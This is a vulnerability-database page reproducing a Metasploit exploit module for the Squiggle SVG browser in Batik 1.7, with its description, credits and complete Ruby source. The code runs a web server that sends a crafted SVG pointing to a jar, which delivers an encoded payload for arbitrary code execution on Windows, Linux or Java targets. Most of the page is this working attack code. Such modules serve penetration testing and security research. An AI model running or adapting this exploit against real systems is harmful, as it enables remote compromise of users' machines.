Lucene search
K

Squiggle 1.7 SVG Browser Java Code Execution

🗓️ 17 May 2012 14:48:38Reported by Nicolas Gregoire, sinn3r <[email protected]>, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 19 Views

This module abuses the SVG support to execute Java Code in the Squiggle Browser included in the Batik framework 1.7 through a crafted SVG file referencing a jar file. It requires the browser to support SVG version 1.1 or newer, support Java code, and have the "Enforce secure scripting" check disabled. Tested against Windows and Linux platforms

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Squiggle 1.7 SVG Browser Java Code Execution",
      'Description'    => %q{
          This module abuses the SVG support to execute Java Code in the
        Squiggle Browser included in the Batik framework 1.7 through a
        crafted SVG file referencing a jar file.

        In order to gain arbitrary code execution, the browser must meet
        the following conditions: (1) It must support at least SVG version
        1.1 or newer, (2) It must support Java code and (3) The "Enforce
        secure scripting" check must be disabled.

        The module has been tested against Windows and Linux platforms.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Gregoire', # aka @Agarri_FR, Abuse discovery and PoC
          'sinn3r',           # Metasploit module
          'juan vazquez'      # Metasploit module
        ],
      'References'     =>
        [
          ['OSVDB', '81965'],
          ['URL', 'http://www.agarri.fr/blog/']
        ],
      'Payload'       =>
        {
          'Space' => 20480,
          'BadChars' => '',
          'DisableNops' => true
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => %w{ java linux win },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [ 'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-05-11',
      'DefaultTarget'  => 0))

  end

  def on_request_uri(cli, request)

    agent = request.headers['User-Agent']
    jar_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
    jar_uri << "/#{rand_text_alpha(rand(6)+3)}.jar"
    rand_text = Rex::Text.rand_text_alphanumeric(rand(8)+4)

    if request.uri =~ /\.jar$/
      paths = [
        [ "Exploit.class" ],
        [ "Exploit$1.class"],
        [ "META-INF", "MANIFEST.MF"]
      ]

      p = regenerate_payload(cli)

      jar  = p.encoded_jar
      paths.each do |path|
        1.upto(path.length - 1) do |idx|
          full = path[0,idx].join("/") + "/"
          if !(jar.entries.map{|e|e.name}.include?(full))
            jar.add_file(full, '')
          end
        end

        fd = File.open(File.join( Msf::Config.data_directory, "exploits", "batik_svg", path ), "rb")
        data = fd.read(fd.stat.size)
        jar.add_file(path.join("/"), data)
        fd.close
      end

      print_status("#{cli.peerhost} - Sending jar payload")
      send_response(cli, jar.pack, {'Content-Type'=>'application/java-archive'})

    elsif agent =~ /Batik/
      svg = %Q|
      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">
      <script type="application/java-archive" xlink:href="#{jar_uri}"/>
      <text>#{rand_text}</text>
      </svg>
      |

      svg = svg.gsub(/\t\t\t/, '')
      print_status("#{cli.peerhost} - Sending SVG")
      send_response(cli, svg, {'Content-Type'=>'image/svg+xml'})

    else
      print_error("#{cli.peerhost} - Unknown client request: #{request.uri.inspect}")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation